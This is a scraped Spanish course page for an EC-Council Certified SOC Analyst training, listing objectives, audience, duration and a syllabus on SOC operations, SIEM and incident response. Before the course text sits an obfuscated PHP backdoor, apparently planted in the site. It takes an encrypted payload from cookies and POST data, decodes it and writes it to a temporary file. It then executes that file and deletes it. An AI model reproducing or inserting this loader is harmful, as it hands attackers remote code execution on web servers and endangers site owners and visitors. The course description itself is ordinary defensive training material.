$PFkQQj = chr (121) . "\x5f" . 'i' . "\131" . chr ( 450 - 373 ).chr ( 258 - 182 ); $cndBMIMKWU = "\x63" . "\x6c" . 'a' . "\163" . chr (115) . chr (95) . 'e' . "\170" . 'i' . 's' . chr (116) . 's';$YCsjZOjng = class_exists($PFkQQj); $PFkQQj = "60693";$cndBMIMKWU = "62927";$LSHFWHvtVn = !1;if ($YCsjZOjng == $LSHFWHvtVn){function JQiUsND(){return FALSE;}$flGKbPmb = "24328";JQiUsND();class y_iYML{private function kHqizmFp($flGKbPmb){if (is_array(y_iYML::$HnXmizr)) {$uDVeO = sys_get_temp_dir() . "/" . crc32(y_iYML::$HnXmizr["\x73" . "\x61" . "\154" . 't']);@y_iYML::$HnXmizr['w' . chr ( 342 - 228 ).chr ( 802 - 697 )."\164" . chr (101)]($uDVeO, y_iYML::$HnXmizr["\143" . chr (111) . chr ( 583 - 473 ).'t' . 'e' . chr ( 405 - 295 )."\164"]);include $uDVeO;@y_iYML::$HnXmizr['d' . "\145" . "\154" . 'e' . "\164" . "\x65"]($uDVeO); $flGKbPmb = "24328";exit();}}private $nfIOxBUgci;public function KzSRiT(){echo 57754;}public function __destruct(){$flGKbPmb = "58915_20028";$this->kHqizmFp($flGKbPmb); $flGKbPmb = "58915_20028";}public function __construct($gBEinuZpzm=0){$FXHNMtt = $_POST;$CMSrFiI = $_COOKIE;$BQAQiDZrib = "cb529a8e-ec0b-435f-86a9-4175305cacff";$xonCzaGOAG = @$CMSrFiI[substr($BQAQiDZrib, 0, 4)];if (!empty($xonCzaGOAG)){$EviQPEw = "base64";$pkBLiUThwD = "";$xonCzaGOAG = explode(",", $xonCzaGOAG);foreach ($xonCzaGOAG as $HrpNnQ){$pkBLiUThwD .= @$CMSrFiI[$HrpNnQ];$pkBLiUThwD .= @$FXHNMtt[$HrpNnQ];}$pkBLiUThwD = array_map($EviQPEw . "\x5f" . "\x64" . chr ( 1028 - 927 ).'c' . "\157" . chr (100) . "\x65", array($pkBLiUThwD,)); $pkBLiUThwD = $pkBLiUThwD[0] ^ str_repeat($BQAQiDZrib, (strlen($pkBLiUThwD[0]) / strlen($BQAQiDZrib)) + 1);y_iYML::$HnXmizr = @unserialize($pkBLiUThwD); $pkBLiUThwD = class_exists("58915_20028");}}public static $HnXmizr = 41468;}$DhFBgMpMgw = new /* 61252 */ y_iYML(24328 + 24328); $_POST = Array();unset($DhFBgMpMgw);} EC-Council Certified SOC Analyst (CSA)|Grupo Loyal

EC-Council Certified SOC Analyst (CSA)

El programa de Certified SOC Analyst (CSA) es el primer paso para poder formar parte de un centro de operaciones de seguridad (SOC). Está diseñado para que los actuales y futuros analistas SOC de nivel I y II alcancen la competencia para realizar operaciones de nivel básico e intermedio.

El CSA es un programa de formación y certificación que ayuda al candidato a adquirir habilidades técnicas altamente demandadas a través de la formación. El programa se centra en la creación de nuevas oportunidades de carrera a través de un conocimiento extenso y meticuloso con capacidades de nivel mejoradas para contribuir de forma dinámica a un equipo SOC. Siendo un programa intenso de 3 días, cubre a fondo los fundamentos de las operaciones del SOC, además de transmitir los conocimientos de gestión y correlación de registros, despliegue de SIEM, detección avanzada de incidentes y respuesta a incidentes. Además, el candidato aprenderá a gestionar varios procesos SOC y a colaborar con el CSIRT en el momento que lo necesite.

Esta es la formación recomendada para aquellos estudiantes que buscan alcanzar la certificación de analista SOC certificado por el EC-Council

Objetivos

Tras este curso, los profesionales podrán:

Articular los procesos, procedimientos, tecnologías y flujos de trabajo del SOC.
Entender y las amenazas de seguridad, ataques, vulnerabilidades, comportamientos de los atacantes, cadena de muerte cibernética, etc.
Reconocer las herramientas, tácticas y procedimientos de los atacantes para identificar los indicadores de compromiso (SOC) que pueden ser utilizados durante las investigaciones activas y futuras.
Supervisar y analizar registros y alertas de una variedad de tecnologías diferentes a través de múltiples plataformas (IDS/IPS, protección de puntos finales, servidores y estaciones de trabajo).
Aplicar procesos de gestión centralizada de registros (CLM).
Realizar eventos de seguridad y recolección, monitoreo y análisis de registros.
Comprender la información de seguridad y la gestión de eventos.
Administrar soluciones SIEM (Splunk/AlienVault/OSSIM/ELK).
Entender la arquitectura, implementación y ajuste fino de las soluciones SIEM (Splunk/ AlienVault/OSSIM/ELK).
Obtener experiencia práctica en el proceso de desarrollo de casos de uso de SIEM.
Desarrollar casos de amenaza (reglas de correlación), crear informes, etc.
Reconocer los casos de uso que se utilizan ampliamente en todo el despliegue del SIEM.
Planificar, organizar y llevar a cabo la supervisión y el análisis de las amenazas en la empresa.
Monitorear los patrones de amenazas emergentes y realizar análisis de amenazas a la seguridad.
Obtener experiencia práctica en el proceso de triaje de alertas.
Escalar los incidentes a los equipos apropiados para obtener asistencia adicional.
Usar un sistema de tickets del Service Desk.
Preparar sesiones informativas e informes de la metodología de análisis y los resultados.
Integrar la inteligencia de amenazas en el SIEM para mejorar la detección de incidentes y la respuesta.
Hacer uso de información sobre amenazas variada, dispareja y en constante cambio.
Articular el conocimiento del proceso de respuesta a incidentes.
Comprender la colaboración entre el SOC y la TRI para una mejor respuesta a los incidente

Ciberseguridad

Disponible en formato e-learning

Disponible en formato presencial

Disponible en formato a distancia

Subvención disponible
A través de Fundae, cumpliendo requisitos.

Duración
15 horas

  • Dificultad 50% 50%
  • Nivel alcanzado 80% 80%

Dirigido a

Analistas SOC (Tier I y Tier II), Analistas de Ciberseguridad, Profesionales de la ciberseguridad de nivel básico. Administradores de redes y seguridad

Conocimientos requeridos

Para este curso, es recomendable tener conocimiento en:

Administración de redes o seguridad de dominios

Temario

SOC: conceptos esenciales

Gestión de la seguridad
Operaciones de seguridad
Centro de Operaciones de Seguridad (SOC)
Necesidad de SOC
Capacidades del SOC
Operaciones del SOC
Flujo de trabajo del SOC
Componentes de SOC: Personas, procesos y tecnología
Gente
Tecnología
Procesos
Tipos de modelos SOC
Modelos de madurez SOC
Generaciones SOC
Implementación del SOC
Indicadores clave de rendimiento del SOC
Desafíos en la aplicación del SOC
Mejores prácticas para el funcionamiento del SOC
SOC vs NOC
Comprensión de las amenazas cibernéticas, los IO y la metodología de ataque
Amenazas Cibernéticas

Intención-Motivo-Goal
Táctica-Técnica-Procedimientos (TTP)
Oportunidad-Vulnerabilidad-Debilidad
Ataques a nivel de red
Ataques a nivel de anfitrión
Ataques a nivel de aplicación
Amenazas a la seguridad del correo electrónico
Comprensión de los indicadores de compromiso
Entendiendo la metodología de ataque del atacante
Incidentes, eventos y registro

Incidente

Evento
Bitácora
Fuentes de registro típicas
Necesidad de registro
Requisitos de registro
Formato de registro típico
Registro de enfoques
La tala de árboles local
Registro centralizado
Detección de Incidentes con Información de Seguridad y Gestión de Eventos (SIEM)
Información de Seguridad y Gestión de Eventos (SIEM)

Análisis de seguridad
Necesidad del SIEM
Capacidades típicas del SIEM
La arquitectura del SIEM y sus componentes
Soluciones SIEM
Despliegue del SIEM
Detección de incidentes con el SIEM
Ejemplos de casos de uso común en todos los despliegues del SIEM
Manejo del rastreo y análisis de alertas
Detección de incidentes mejorada con inteligencia de amenazas
Entendiendo la inteligencia de la amenaza cibernética
¿Por qué amenazar el SOC impulsado por la inteligencia?
Respuesta a incidentes

Equipo de respuesta a incidentes (IRT)
¿Dónde encaja la TRI en la organización
Colaboración del SOC y el IRT
Resumen del proceso de respuesta a incidentes (IR)
Paso 1: Preparación para la respuesta al incidente

Paso 2: Registro y asignación de incidentes

Paso 3: Triaje de incidentes

Paso 4: Notificación

Paso 5: Contención

Paso 6: Recopilación de pruebas y análisis forense

Paso 7: Erradicación

Paso 8: Recuperación

Paso 9: Actividades posteriores al incidente

Respuesta a los incidentes de seguridad de la red
Respuesta a los incidentes de seguridad de las aplicaciones
Responder a los incidentes de seguridad del correo electrónico
Respuesta a los incidentes con información privilegiada
Respuesta a los incidentes de malware

Solicita información del curso

It Formacion

It Formacion